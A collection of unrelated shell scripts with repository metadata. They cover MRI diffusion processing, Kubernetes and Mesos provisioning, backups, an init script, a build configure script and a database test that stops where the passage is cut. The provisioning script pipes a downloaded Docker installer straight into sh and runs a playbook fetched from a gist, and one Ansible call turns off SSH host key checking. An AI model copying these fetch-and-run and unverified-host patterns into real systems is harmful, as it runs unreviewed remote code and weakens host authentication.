ansible-playbook --key-file=${key_file} --ssh-extra-args="-o StrictHostKeyChecking=no" -i ${inventory_file} -e "mongodb_master_target=$mongodb_master_target mongodb_replicas_target=$mongodb_replicas_target project=$project" ${playbook_file}
| true
|
ba8b401c7b8e9b4631a28b263df0905fb450c92d
|
Shell
|
jrussell9000/NeuroScripts
|
/old/DWI_Processing_v1/Old/multifiber.sh
|
UTF-8
| 7,445
| 3.3125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -e
# preproc_done_dir=$1
# working_dir=$2
# anat_dir=$3
#Directory to the OASIS Templates from the ANTs GitHub page (MICCAI2012-Multi-Atlas-Challenge-Data)
INPUT_DIR="/home/jdrussell3/ceda_scans/1000_C1/dicoms"
ANTSTEMPLATES="/home/jdrussell3/apps/ants/ants-templates/MICCAI2012-Multi-Atlas-Challenge-Data"
preproc_done_dir="/home/jdrussell3/ceda_scans/1000_C1/dwi_processing/preproc"
working_dir="/home/jdrussell3/ceda_scans/1000_C1/dwi_processing/mrtrixproc"
anat_dir="/home/jdrussell3/ceda_scans/1000_C1/dwi_processing/anat"
mrtrix_dir=$(command -v mrview)
if [ -z "${mrtrix_dir}" ]; then
printf "MRTrix3 not found. Verify that MRTrix3 is included in the path"
else
mrtrix_dir=${mrtrix_dir%/*/*}
fi
# Make temporary directories for processing
tmp_dir() {
unset rand
unset TMP
rand=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1)
TMP=/tmp/proc_${rand}
mkdir "${TMP}"
}
if [ -d "${working_dir}" ]; then
rm -rf "${working_dir}"
fi
mkdir "${working_dir}"
#Bring in the finished preprocessed scan file
mrconvert -fslgrad "${preproc_done_dir}"/PA_AP.bvec "${preproc_done_dir}"/PA_AP.bval "${preproc_done_dir}"/eddy_unwarped_images.nii.gz "${working_dir}"/dwi.mif
cd "${working_dir}" || exit
#MASK CREATION
dwi2mask dwi.mif dwi_mask.mif
maskfilter dwi_mask.mif dilate dwi_mask_dilated.mif -npass 3
#SPHERICAL DECONVOLUTION
dwi2response dhollander dwi.mif response_wm.txt response_gm.txt response_csf.txt -mask dwi_mask.mif
dwi2fod msmt_csd dwi.mif response_wm.txt FOD_WM.mif response_gm.txt FOD_GM.mif response_csf.txt FOD_CSF.mif -mask dwi_mask_dilated.mif -lmax 10,0,0
mrconvert FOD_WM.mif FOD_WM_temp.mif -coord 3 0
mrcat FOD_CSF.mif FOD_GM.mif FOD_WM_temp.mif tissues.mif -axis 3
rm FOD_WM_temp.mif
#ANATOMICAL PROCESSING
if [ -d "${anat_dir}" ]; then
rm -rf "${anat_dir}"
fi
mkdir "${anat_dir}"
for file in "${INPUT_DIR}"/*MPRAGE*.tgz; do
tmp_dir
cp "$file" "$TMP"
tar xf "$TMP"/"$(basename "${file}")" -C "$TMP"
dcm2niix -z y "$TMP"
imcp "$TMP"/*.nii.gz "${anat_dir}"/T1.nii.gz
#cp "$TMP"/*.bval "$OUTPUT_DIR"/raw/"$pos_enc".bval - Must use the bval and bvec files from the scanner, values in dicoms are incorrect
#cp "$TMP"/*.bvec "$OUTPUT_DIR"/raw/"$pos_enc".bvec
cp "$TMP"/*.json "${anat_dir}"/T1.json
rm -rf "${TMP}"
done
cd "${anat_dir}" || exit 1
cp "${ANTSTEMPLATES}"/T_template0.nii.gz "${ANTSTEMPLATES}"/T_template0_BrainCerebellumProbabilityMask.nii.gz \
"${ANTSTEMPLATES}"/T_template0_BrainCerebellumRegistrationMask.nii.gz "${anat_dir}"
antsBrainExtraction.sh -d 3 -a T1.nii.gz -e T_template0.nii.gz \
-m T_template0_BrainCerebellumProbabilityMask.nii.gz -o output.nii.gz -f T_template0_BrainCerebellumRegistrationMask.nii.gz
#PREPARING FILES FOR REGISTRATION
mrconvert "${anat_dir}"/T1.nii.gz "${working_dir}"/T1.mif
mrconvert "${anat_dir}"/output.nii.gzBrainExtractionBrain.nii.gz "${working_dir}"/T1_sscorr_brain.mif
mrconvert "${anat_dir}"/output.nii.gzBrainExtractionMask.nii.gz "${working_dir}"/T1_sscorr_mask.mif
cd "${working_dir}" || exit 1
dwiextract dwi.mif -bzero dwi_bzero.mif
mrcalc dwi_bzero.mif 0.0 -max dwi_bzero_0max.mif
mrmath dwi_bzero_0max.mif mean -axis 3 dwi_meanbzero.mif
mrcalc 1 dwi_meanbzero.mif -div dwi_mask.mif -mult dwi_div.mif
mrhistmatch nonlinear dwi_div.mif T1_sscorr_brain.mif dwi_pseudoT1.mif -mask_input dwi_mask.mif -mask_target T1_sscorr_mask.mif
mrcalc 1 T1_sscorr_brain.mif -div T1_sscorr_mask.mif -mult T1_div.mif
mrhistmatch nonlinear T1_div.mif dwi_meanbzero.mif T1_pseudobzero.mif -mask_input T1_sscorr_mask.mif -mask_target dwi_mask.mif
#T1->DWI REGISTRATION
mrregister -force T1_sscorr_brain.mif dwi_pseudoT1.mif -type rigid -mask1 T1_sscorr_mask.mif -mask2 dwi_mask.mif -rigid rigid_T1_to_pseudoT1.txt
mrregister -force T1_pseudobzero.mif dwi_meanbzero.mif -type rigid -mask1 T1_sscorr_mask.mif -mask2 dwi_mask.mif -rigid rigid_pseudobzero_to_bzero.txt
transformcalc -force rigid_T1_to_pseudoT1.txt rigid_pseudobzero_to_bzero.txt average rigid_T1_to_dwi.txt
mrtransform -force T1.mif T1_registered.mif -linear rigid_T1_to_dwi.txt
mrconvert -force T1_sscorr_mask.mif T1_mask.mif -datatype bit
mrtransform -force T1_mask.mif T1_mask_registered.mif -linear rigid_T1_to_dwi.txt -template T1_registered.mif -interp nearest -datatype bit
# rm T1_sscorr_brain.mif
# rm dwi_meanbzero.mif
# rm rigid_T1_to_pseudoT1.txt
# rm rigid_pseudobzero_to_bzero.txt
# rm T1.mif
recon_dir="${anat_dir}"/recon
if [ -d "$recon_dir" ] ; then
rm -rf "${recon_dir}"
fi
mkdir "${recon_dir}"
cp T1_registered.mif T1_mask_registered.mif "${anat_dir}"
cd "${anat_dir}" || exit 1
#GENERATE 5TT IMAGE
fivettgen_dir=${anat_dir}/fivettgen
mkdir ${fivettgen_dir}
cp T1_registered.mif T1_mask_registered.mif "${fivettgen_dir}"
cd "${fivettgen_dir}" || exit 1
5ttgen fsl T1_registered.mif 5TT.mif -mask T1_mask_registered.mif
5tt2vis 5TT.mif vis.mif
#PARCELLATE THE REGISTERED T1
cp T1_registered.mif T1_mask_registered.mif "${anat_dir}"
ln -s "$SUBJECTS_DIR"/fsaverage "${recon_dir}"/fsaverage
ln -s "$SUBJECTS_DIR"/rh.EC_average "${recon_dir}"/rh.EC_average
ln -s "$SUBJECTS_DIR"/lh.EC_average "${recon_dir}"/lh.EC_average
mrconvert T1_registered.mif T1_registered.nii
recon-all -sd "${recon_dir}" -subjid freesurfer -i T1_registered.nii
time recon-all -sd "${recon_dir}" -subjid freesurfer -all -mprage
#Does fsaverage containi the HCPMMP annotations, or do we need to get them?
hemispheres="lh rh"
for hemi in $hemispheres; do
SUBJECTS_DIR="${recon_dir}"
mri_surf2surf --srcsubject fsaverage --trgsubject freesurfer --hemi "${hemi}" --sval-annot "${SUBJECTS_DIR}"/fsaverage/label/"${hemi}".HCPMMP1.annot \
--tval "${SUBJECTS_DIR}"/freesurfer/label/"${hemi}".HCPMMP1.annot
done
cd "${recon_dir}" || exit 1
mri_aparc2aseg --s freesurfer --old-ribbon --annot HCPMMP1 --o aparc.HCPMMP1+aseg.mgz
labelconvert "${recon_dir}"/aparc.HCPMMP1+aseg.mgz "${mrtrix_dir}"/share/mrtrix3/labelconvert/hcpmmp1_original.txt \
"${mrtrix_dir}"/share/mrtrix3/labelconvert/hcpmmp1_ordered.txt parc_init.mif
labelsgmfix parc_init.mif ../T1_registered.mif "${mrtrix_dir}"/share/mrtrix3/labelconvert/hcpmmp1_ordered.txt parc.mif
n_nodes=$(mrstats parc.mif -output max)
#n_streamlines=$((500 * n_nodes * $((n_nodes -1)) ))
cp 5TT.mif "${anat_dir}"
cd "${working_dir}" || exit
# trackproc_dir="${working_dir}"/trackproc
# if [ -d "${trackproc_dir}" ]; then
# rm -rf "${trackproc_dir}"
# fi
# mkdir "${trackproc_dir}"
# cd "${trackproc_dir}" || exit
cp "${fivettgen_dir}"/5TT.mif "${working_dir}"
tckgen FOD_WM.mif tractogram.tck -act 5TT.mif -backtrack -crop_at_gmwmi -maxlength 250 -power 0.33 -select 1000000 -seed_dynamic FOD_WM.mif
tcksift2 tractogram.tck FOD_WM.mif weights.csv -act 5TT.mif -out_mu mu.txt -fd_scale_gm
tckmap tractogram.tck -tck_weights_in weights.csv -template FOD_WM.mif -precise track.mif
mu=$(cat mu.txt)
mrcalc track.mif "${mu}" -mult tdi_native.mif
tckmap tractogram.tck -tck_weights_in weights.csv -template vis.mif -vox 1 -datatype uint16 tdi_highres.mif
tck2connectome tractogram.tck parc.mif connectome.csv -tck_weights_in weights.csv -out_assignments assignments.csv
tck2connectome tractogram.tck parc.mif meanlength.csv -tck_weights_in weights.csv -scale_length -stat_edge mean
connectome2tck tractogram.tck assignments.csv exemplars.tck -tck_weights_in weights.csv -exemplars parc.mif -files single
label2mesh parc.mif nodes.obj
meshfilter nodes.obj smooth nodes_smooth.obj
| true
|
8e601e15bd7a2576b06988515890b6c3f34c3144
|
Shell
|
indigo-iam/iam-deployment-test
|
/generate_deploy_files.sh
|
UTF-8
| 351
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
set -xe
if [ -z ${BROWSER+x} ] || [ -z ${DOCKER_REGISTRY_HOST+x} ] || [ -z ${IAM_IMAGE+x} ]; then
echo "Environment variables BROWSER, DOCKER_REGISTRY_HOST, IAM_IMAGE are mandatory"
exit 1
fi
for file in `find kubernetes/ -type f -name *.tmpl`; do
newfile=`basename -s .tmpl ${file}`
envsubst < ${file} > kubernetes/${newfile}
done
| true
|
978bfa55e61debdcc0c42499f4bb00bc1c0f331f
|
Shell
|
maureliofs/exercicios-shell-script
|
/Lista2/GeraBackupHome.sh
|
UTF-8
| 3,558
| 4.21875
| 4
|
[] |
no_license
|
#!/bin/bash
#########################################################################################################################################
#2. Crie um script que gere um arquivo compactado de backup de todo o diretório home do usuário atual (/home/<usuario>). Considere que: #
#• O arquivo de backup será criado no diretório /home/<usuario>/Backup #
#• O nome do arquivo de backup deve seguir o padrão backup_home_AAAAMMDDHHMM.tgz, exemplo backup_home_201708241533.tgz #
#• Caso o diretório /home/<usuario>/Backup não exista, o script deve criá-lo #
#• Antes de criar o backup, o script deve consultar se existe algum arquivo de backup criado na última semana. Se exisitir, #
#o usuário deve ser consultado se deseja continuar. Se o usuário optar por não continuar, o script deve abortar com código de saída 1. #
#• Após gerar o backup, o script deve informar o nome do arquivo gerado. #
# #
#Exemplo de Execução: #
#$ ./GeraBackupHome.sh #
#Já foi gerado um backup do diretório /home/ricardo nos últimos 7 dias. #
#Deseja continuar? (N/s): s #
#Será criado mais um backup para a mesma semana #
#Criando Backup... #
#O backup de nome "backup_home_201708241547.tgz" foi criado em /home/ricardo/Backup #
#Backup Concluído! #
#########################################################################################################################################
BACKUP_DIR=$HOME/Backup
BACKUP_NAME=backup_home_$(date +%Y%m%d%H%M).tgz
DAYS7=$(find $BACKUP_DIR -ctime -7 -name backup_home\*tgz)
if [ ! -d $BACKUP_DIR ]
then
echo "Criando Diretório $BACKUP_DIR..."
mkdir -p $BACKUP_DIR
fi
if [ "$DAYS7" ] # Testa se a variavel é nula
then
echo "Já foi gerado um backup do diretório $(echo $HOME) nos últimos 7 dias."
echo -n "Deseja continuar? (N/s): "
read -n1 CONT #-n1 captura so 1 tecla pressionada ou o ENTER
if [ "$CONT" = N -o "$CONT" = n -o "$CONT" = "" ]
then
echo ""
echo "Backup Abortado!"
exit 1
elif [ "$CONT" = S -o "$CONT" = s ]
then
echo ""
echo "Será criado mais um backup para a mesma semana"
else
echo "Opção Inválida"
exit 2
fi
fi
echo "Criando Backup..."
tar czpvf $BACKUP_DIR/$BACKUP_NAME --exclude="$BACKUP_DIR" "$HOME"/* > /dev/null 2>&1
echo "O backup de nome \"$(echo $BACKUP_NAME)\" foi criado em $(echo $BACKUP_DIR)"
echo "Backup Concluído!"
| true
|
fcd80ac0c0066c654ef5d8d79298e87ce9f2a32d
|
Shell
|
nuniesmith/Scripts
|
/script8-2-4a
|
UTF-8
| 291
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
#This program requires that you enter arguments for item name, cost,
#selling price and inventory number on the command line.
echo -e "$1 \t $2 \t $3 \t $4" >> ~/hardware.database
sort ~/hardware.database > /tmp/$$.tmp
rm ~/hardware.database
mv /tmp/$$.tmp ~/hardware.database
| true
|
0cae7aa21128f9b5f9da8a757351035a50c299be
|
Shell
|
ychen-sps/mesos-framework-demo
|
/runtime/provision/install_mesos_dns.sh
|
UTF-8
| 1,194
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
sudo su
systemctl status mesosdns >/dev/null 2>&1 && echo "Mesos DNS already installed" && exit 0
echo "Downloading Mesos DNS"
go get github.com/mesosphere/mesos-dns
mkdir -p /opt/mesosdns/bin
export GOPATH=$HOME/go
mv $GOPATH/bin/mesos-dns /opt/mesosdns/bin/
echo "Installing Mesos DNS"
cat <<EOT > /opt/mesosdns/config.json
{
"zk": "zk://mesos.master1:2181/mesos",
"masters": ["127.0.0.1:5050"],
"refreshSeconds": 60,
"ttl": 60,
"domain": "mesos",
"port": 53,
"resolvers": ["8.8.8.8", "8.8.4.4"],
"timeout": 5,
"httpon": true,
"dsnon": true,
"httpport": 8123,
"externalon": true,
"listener": "0.0.0.0",
"SOAMname": "root.ns1.mesos",
"SOARname": "ns1.mesos",
"SOARefresh": 60,
"SOARetry": 600,
"SOAExpire": 86400,
"SOAMinttl": 60
}
EOT
cat <<EOT > /usr/lib/systemd/system/mesosdns.service
[Unit]
Description=Mesos DNS
After=network.target
Wants=network.target
[Service]
ExecStart=/opt/mesosdns/bin/mesos-dns -config=/opt/mesosdns/config.json
Restart=always
[Install]
WantedBy=multi-user.target
EOT
systemctl daemon-reload
systemctl restart mesosdns
systemctl enable mesosdns
| true
|
d31de1c82aeaa96e042b3910264fa99b61c53c57
|
Shell
|
virgo-agent-toolkit/virgo-base-agent
|
/pkg/sysv-redhat/agent
|
UTF-8
| 1,088
| 3.75
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#
# Startup script for $SHORT_DESCRIPTION
#
# chkconfig: 345 85 15 - start or stop process definition within the boot process
# description: $SHORT_DESCRIPTION
# processname: $PKG_NAME
# pidfile: /var/run/$PKG_NAME.pid
NAME=$PKG_NAME
DAEMON=/usr/bin/$PKG_NAME
PIDFILE=/var/run/$PKG_NAME.pid
LOG=/var/log/$PKG_NAME.log
# Source function library. This creates the operating environment for the process to be started
. /etc/init.d/functions
case "$1" in
start)
echo -n "Starting $DAEMON: "
daemon $DAEMON -D -p $PIDFILE -l $LOG --production --restart-sysv-on-upgrade
echo
touch /var/lock/subsys/process-name
;;
stop)
echo -n "Shutting down $DAEMON: "
killproc $DAEMON
echo
rm -f $PIDFILE
;;
status)
status $DAEMON
;;
restart)
$0 stop
$0 start
;;
reload)
echo -n "Reloading $DAEMON: "
killproc $DAEMON -HUP
echo
;;
*)
echo "Usage: $0 {start|stop|restart|reload|status}"
exit 1
esac
exit 0
| true
|
91574880e523794e746616cfd3d523a68ab1ad71
|
Shell
|
hemanth22/k8s_Learnings
|
/kubernetesprov.sh
|
UTF-8
| 2,086
| 2.9375
| 3
|
[] |
no_license
|
echo "Initialized Prerequistie tools."
yum -y install epel-release
yum -y install wget sudo*
yum -y install figlet vim
yum -y install qemu-kvm libvirt libvirt-daemon-kvm
yum -y install ansible*
echo "Completed Prerequistie tools installation." | figlet
echo "Initialized Docker Provision." | figlet
wget -O- https://get.docker.com/ | sh
usermod -aG docker vagrant
echo "Completed Docker Provision." | figlet
echo "Enabling services." | figlet
systemctl start docker
systemctl enable docker
systemctl status -l docker
systemctl start libvirtd
systemctl enable libvirtd
systemctl status -l libvirtd
echo "Completed Services are active and running." | figlet
echo "Started Network Provision." | figlet
echo "Enabling Firewall services." | figlet
systemctl start firewalld
systemctl enable firewalld
systemctl status -l firewalld
echo "Firewall Services are active and running." | figlet
echo "Adding Rules to firewall." | figlet
firewall-cmd --add-port=4789/tcp --permanent
firewall-cmd --add-port=2789/tcp --permanent
firewall-cmd --add-port=7946/tcp --permanent
firewall-cmd --add-port=2377/tcp --permanent
firewall-cmd --add-port=2376/tcp --permanent
firewall-cmd --add-port=8080/tcp --permanent
firewall-cmd --add-port=80/tcp --permanent
echo "Firewall rules configuration complete." | figlet
echo "Restart Firewall." | figlet
firewall-cmd --reload
echo "Firewall restart Completed." | figlet
echo "New Rules patch completed." | figlet
echo "Firewall Network Rules Listing." | figlet
firewall-cmd --list-port
echo "Completed Docker and Network Configuation." | figlet
echo "Download Kubernetes modules from ansible galaxy" | figlet
ansible-galaxy install geerlingguy.kubernetes
echo "Completed downloading module" | figlet
echo "Download and install kubernetes.playbook" | figlet
wget -O kubernetes.playbook https://gist.githubusercontent.com/hemanth22/871f04f7110ff1ce60da05f9c5b1e766/raw/b28b1a24ce28605796fb56104635e1240d2d28cb/kubernetes.playbook
ansible-playbook kubernetes.playbook
echo "Completed kubernetes.playbook installation." | figlet
echo "Provision completed." | figlet
| true
|
568776eef1acec4e51e61ce0c3c45bc4619ac012
|
Shell
|
guiquanz/lemon
|
/tools/configure.sh
|
UTF-8
| 7,402
| 3.375
| 3
|
[] |
no_license
|
# Copyright (c) 2013-2014 The lemon Authors. All rights reserved.
# Use of this source code is governed by GPL license that can be
# found in the LICENSE file. See the AUTHORS file for names of contributors.
###############################################################################
#!/bin/sh
#
# Detects OS we're compiling on and outputs a file specified by the first
# argument, which in turn gets read while processing Makefile.
#
# The output will set the following variables:
# AR Archiver
# CC C Compiler path
# CXX C++ Compiler path
# CC_LD C Linker
# CXX_LD C++ Linker
# PLATFORM_LDFLAGS Linker flags
# PLATFORM_LIBS Libraries flags
# PLATFORM_SHARED_EXT Extension for shared libraries
# PLATFORM_SHARED_LDFLAGS Flags for building shared library
# This flag is embedded just before the name
# of the shared library without intervening spaces
# PLATFORM_SHARED_CFLAGS Flags for compiling objects for shared library
# PLATFORM_CCFLAGS C compiler flags
# PLATFORM_CXXFLAGS C++ compiler flags. Will contain:
# PLATFORM_SHARED_VERSIONED Set to 'true' if platform supports versioned
# shared libraries, empty otherwise.
#
# The PLATFORM_CCFLAGS and PLATFORM_CXXFLAGS might include the following:
#
OUTPUT=$1
PREFIX=$2
FORCE=$3
if test -z "$OUTPUT" || test -z "$PREFIX"; then
echo "usage: $0 <output-filename> <directory_prefix> [-f]" >&2
exit 1
fi
# Delete existing output, if it exists
OUTPUT=$PREFIX/$OUTPUT
if test -f $OUTPUT -a -z "$FORCE"; then
exit 0
fi
rm -f $OUTPUT
touch $OUTPUT
if test -z "$AR"; then
AR=ar
fi
if test -z "$CC"; then
CC=cc
fi
if test -z "$CXX"; then
CXX=g++
fi
if test -z "$LD"; then
LD=ld
fi
CC_LD=$LD
CXX_LD=$LD
# Detect OS
if test -z "$TARGET_OS"; then
TARGET_OS=`uname -s`
fi
# Detect machine hardware name
if test -z "$TARGET_M"; then
TARGET_M=`uname -m`
fi
ARFLAGS=rcu
COMMON_FLAGS=
CROSS_COMPILE=
PLATFORM_CCFLAGS=
PLATFORM_CXXFLAGS=
PLATFORM_LDFLAGS=
PLATFORM_LIBS=
PLATFORM_SHARED_EXT="so"
PLATFORM_STATIC_EXT="a"
PLATFORM_SHARED_LDFLAGS="-shared -Wl,-soname -Wl,"
PLATFORM_SHARED_CFLAGS=
PLATFORM_SHARED_VERSIONED=true
ECHO_OPT=
case "$TARGET_OS" in
AIX)
CC=xlc
CXX=xlC
ARFLAGS= -X64 rcu
PLATFORM=OS_IBMAIX
COMMON_FLAGS="-DOS_AIX"
PLATFORM_CCFLAGS="-q64 -D_THREAD_SAFE -D_H_LOCALEDEF"
PLATFORM_CXXFLAGS="-qrtti -q64 -D_THREAD_SAFE"
PLATFORM_LDFLAGS="-brtl -bexpall"
PLATFORM_SHARED_LDFLAGS="-b64 -G -bnoentry -brtl -bexpall"
PLATFORM_LIBS="-lpthread -lodm -lcfg -lrt -lm"
;;
Darwin)
PLATFORM=OS_MACOSX
COMMON_FLAGS="-DOS_MACOSX"
PLATFORM_SHARED_EXT=dylib
[ -z "$INSTALL_PATH" ] && INSTALL_PATH=`pwd`
PLATFORM_SHARED_LDFLAGS="-dynamiclib -install_name $INSTALL_PATH/"
;;
Linux)
PLATFORM=OS_LINUX
CXX_LD=$CXX
CC_LD=$CC
COMMON_FLAGS="-O2 -pthread -DOS_LINUX -fPIC"
PLATFORM_LDFLAGS="-lpthread -Wl,-E -ldl"
PLATFORM_SHARED_CFLAGS="-fPIC"
PLATFORM_LIBS="-ldl -lm"
ECHO_OPT="-e"
;;
SunOS)
PLATFORM=OS_SOLARIS
COMMON_FLAGS="-D_REENTRANT -DOS_SOLARIS"
PLATFORM_LIBS="-lpthread -lsocket -lnsl -lrt"
;;
FreeBSD)
PLATFORM=OS_FREEBSD
COMMON_FLAGS="-D_REENTRANT -DOS_FREEBSD"
PLATFORM_LIBS="-lpthread"
;;
NetBSD)
PLATFORM=OS_NETBSD
CC_LD=$CC
CXX_LD=$CXX
COMMON_FLAGS="-D_REENTRANT -DOS_NETBSD"
PLATFORM_LIBS="-lpthread -lgcc_s"
;;
OpenBSD)
PLATFORM=OS_OPENBSD
COMMON_FLAGS="-D_REENTRANT -DOS_OPENBSD"
PLATFORM_LDFLAGS="-pthread"
;;
DragonFly)
PLATFORM=OS_DRAGONFLYBSD
COMMON_FLAGS="-D_REENTRANT -DOS_DRAGONFLYBSD"
PLATFORM_LIBS="-lpthread"
;;
OS_ANDROID_CROSSCOMPILE)
PLATFORM=OS_ANDROID
COMMON_FLAGS="-D_REENTRANT -DOS_ANDROID -DLEVELDB_PLATFORM_POSIX"
PLATFORM_LDFLAGS="" # All pthread features are in the Android C library
CROSS_COMPILE=true
;;
HP-UX)
PLATFORM=OS_HPUX
CXX=aCC
PLATFORM_SHARED_EXT="sl"
COMMON_FLAGS="-DOS_HPUX"
if test "$TARGET_M" = "ia64"; then
PLATFORM_CXXFLAGS=" +DD64 \
-AA \
-Wl,-E \
-D_RWSTD_MULTI_THREAD -D_REENTRANT \
+W829,749 \
-D__HP_NO_MATH_OVERLOADS \
-D__HPACC_STRICTER_ANSI__ \
-D__HPACC_USING_MULTIPLIES_IN_FUNCTIONAL\
+inst_implicit_include"
PLATFORM_SHARED_LDFLAGS="-b"
PLATFORM_LIBS="-lpthread -lxti -lm -lrt"
else
PLATFORM_CXXFLAGS=" -AA +z -lstd_v2 -lCsup_v2 \
-Wl,-E \
-D_RWSTD_MULTI_THREAD -D_REENTRANT \
+W829,749 \
-D__HP_NO_MATH_OVERLOADS \
-D__HPACC_STRICTER_ANSI__ \
-D__HPACC_USING_MULTIPLIES_IN_FUNCTIONAL \
+inst_implicit_include"
PLATFORM_SHARED_LDFLAGS="-b -lc"
PLATFORM_LIBS="-lpthread -lxti -lm -lc -lrt"
fi
;;
OSF1)
PLATFORM=OS_COMPAQ
CXX=cxx
COMMON_FLAGS="-D_REENTRANT -DOS_COMPAQ"
PLATFORM_CXXFLAGS="-D__USE_STD_IOSTREAM -D_POSIX_PII_SOCKET -D_SOCKADDR_LEN"
PLATFORM_LDFLAGS="-pthread"
PLATFORM_SHARED_LDFLAGS="-shared -no_archive -lc"
PLATFORM_LIBS="-lm"
;;
*)
echo "Unknown platform!" >&2
exit 1
esac
MEMCMP_FLAG=
if test "$CXX" = "g++"; then
# Use libc's memcmp instead of GCC's memcmp. This results in ~40%
# performance improvement on readrandom under gcc 4.4.3 on Linux/x86.
MEMCMP_FLAG="-fno-builtin-memcmp"
fi
COMMON_FLAGS="$COMMON_FLAGS $MEMCMP_FLAG"
PLATFORM_CCFLAGS="$PLATFORM_CCFLAGS $COMMON_FLAGS"
PLATFORM_CXXFLAGS="$PLATFORM_CXXFLAGS $COMMON_FLAGS"
echo "CC=$CC" >> $OUTPUT
echo "CXX=$CXX" >> $OUTPUT
echo "CC_LD=$CC_LD" >> $OUTPUT
echo "CXX_LD=$CXX_LD" >> $OUTPUT
echo "AR=$AR" >> $OUTPUT
echo "ARFLAGS=$ARFLAGS" >> $OUTPUT
echo "PLATFORM=$PLATFORM" >> $OUTPUT
echo "PLATFORM_LDFLAGS=$PLATFORM_LDFLAGS" >> $OUTPUT
echo "PLATFORM_LIBS=$PLATFORM_LIBS" >> $OUTPUT
echo "PLATFORM_CCFLAGS=$PLATFORM_CCFLAGS" >> $OUTPUT
echo "PLATFORM_CXXFLAGS=$PLATFORM_CXXFLAGS" >> $OUTPUT
echo "PLATFORM_SHARED_CFLAGS=$PLATFORM_SHARED_CFLAGS" >> $OUTPUT
echo "PLATFORM_SHARED_EXT=$PLATFORM_SHARED_EXT" >> $OUTPUT
echo "PLATFORM_STATIC_EXT=$PLATFORM_STATIC_EXT" >> $OUTPUT
echo "PLATFORM_SHARED_LDFLAGS=$PLATFORM_SHARED_LDFLAGS" >> $OUTPUT
echo "PLATFORM_SHARED_VERSIONED=$PLATFORM_SHARED_VERSIONED" >> $OUTPUT
echo "ECHO_OPT=$ECHO_OPT" >> $OUTPUT
echo "" >> $OUTPUT
cat $OUTPUT
| true
|
b17c46f4db0615f769f01e3635363ebb324679b4
|
Shell
|
neufbox/misc
|
/efixo-base-files/files/main/etc/init.d/wan
|
UTF-8
| 995
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/sh /etc/rc.common
boot() {
# IGMP DSCP/MARK
iptables -t mangle -A OUTPUT -p tcp -m dscp --dscp 0x2d -j MARK --set-mark 3
iptables -t mangle -A OUTPUT -p udp -m dscp --dscp 0x2d -j MARK --set-mark 3
# Femtocell
[ -e /etc/init.d/adsl ] && {
femto_port=`nvram get femto_port`
for gw in `nvram list_long femto_gateway`
do
iptables -t mangle -A FORWARD -p udp -d ${gw} -m udp --dport ${femto_port} -j MARK --set-mark 3
done
}
start
}
start() {
[ ! -e "/etc/init.d/adsl" ] && exit 0
dhcpc_voip_ifname=$(nvram get dhcpc_voip_ifname)
# setup local lan IP address
lan_ipaddr=$(nvram get lan_ipaddr)
lan_netmask=$(nvram get lan_netmask)
IPADDR=${lan_ipaddr}
eval $(ipcalc -np ${lan_ipaddr} ${lan_netmask})
iptables -D INPUT -i ${dhcpc_voip_ifname} -m state --state NEW -s ${NETWORK}/${PREFIX} -j LAN_FILTER 2>/dev/null
}
stop() {
[ ! -e "/etc/init.d/adsl" ] && exit 0
dhcpc_voip_ifname=$(nvram get dhcpc_voip_ifname)
ip addr flush dev ${dhcpc_voip_ifname}
}
| true
|
77fb373c639a7c6e6693a3137eed2a87e7c92131
|
Shell
|
Bramha-N/linuxShell
|
/d10-11-programing_construct/d10_flip_coin_simulation/UC1-flipCoinSimulator.sh
|
UTF-8
| 251
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash -x
Heads=0
Tails=0
Flip_Coin=$(($RANDOM%2))
if [[ $Flip_Coin -eq 0 ]]
then
echo "Head"
((Heads++))
else
echo "Tails"
((Tails++))
fi
| true
|
292eaf9cdbb3ed1bcdba239e534235cff0aa6b0e
|
Shell
|
overvenus/ticdc
|
/tests/syncpoint/run.sh
|
UTF-8
| 5,406
| 3.296875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
CUR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
source $CUR/../_utils/test_prepare
WORK_DIR=$OUT_DIR/$TEST_NAME
CDC_BINARY=cdc.test
SINK_TYPE=$1
CDC_COUNT=3
DB_COUNT=4
# The follow `sleep 2` make sure the ddl and dml operation can always execute during the test.
# So every syncpoint will have different data and the diff tool can judge the syncpoint's validity.
function ddl() {
run_sql "DROP table IF EXISTS testSync.simple1"
sleep 2
run_sql "DROP table IF EXISTS testSync.simple2"
sleep 2
run_sql "CREATE table testSync.simple1(id int primary key, val int);"
sleep 2
run_sql "INSERT INTO testSync.simple1(id, val) VALUES (1, 1);"
sleep 2
run_sql "INSERT INTO testSync.simple1(id, val) VALUES (2, 2);"
sleep 2
run_sql "INSERT INTO testSync.simple1(id, val) VALUES (3, 3);"
sleep 2
run_sql "INSERT INTO testSync.simple1(id, val) VALUES (4, 4);"
sleep 2
run_sql "INSERT INTO testSync.simple1(id, val) VALUES (5, 5);"
sleep 2
run_sql "INSERT INTO testSync.simple1(id, val) VALUES (6, 6);"
sleep 2
run_sql "CREATE table testSync.simple2(id int primary key, val int);"
sleep 2
run_sql "INSERT INTO testSync.simple2(id, val) VALUES (1, 1);"
sleep 2
run_sql "INSERT INTO testSync.simple2(id, val) VALUES (2, 2);"
sleep 2
run_sql "INSERT INTO testSync.simple2(id, val) VALUES (3, 3);"
sleep 2
run_sql "INSERT INTO testSync.simple2(id, val) VALUES (4, 4);"
sleep 2
run_sql "INSERT INTO testSync.simple2(id, val) VALUES (5, 5);"
sleep 2
run_sql "INSERT INTO testSync.simple2(id, val) VALUES (6, 6);"
sleep 2
run_sql "CREATE index simple1_val ON testSync.simple1(val);"
sleep 2
run_sql "CREATE index simple2_val ON testSync.simple2(val);"
sleep 2
run_sql "DELETE FROM testSync.simple1 where id=1;"
sleep 2
run_sql "DELETE FROM testSync.simple2 where id=1;"
sleep 2
run_sql "DELETE FROM testSync.simple1 where id=2;"
sleep 2
run_sql "DELETE FROM testSync.simple2 where id=2;"
sleep 2
run_sql "DROP index simple1_val ON testSync.simple1;"
sleep 2
run_sql "DROP index simple2_val ON testSync.simple2;"
sleep 2
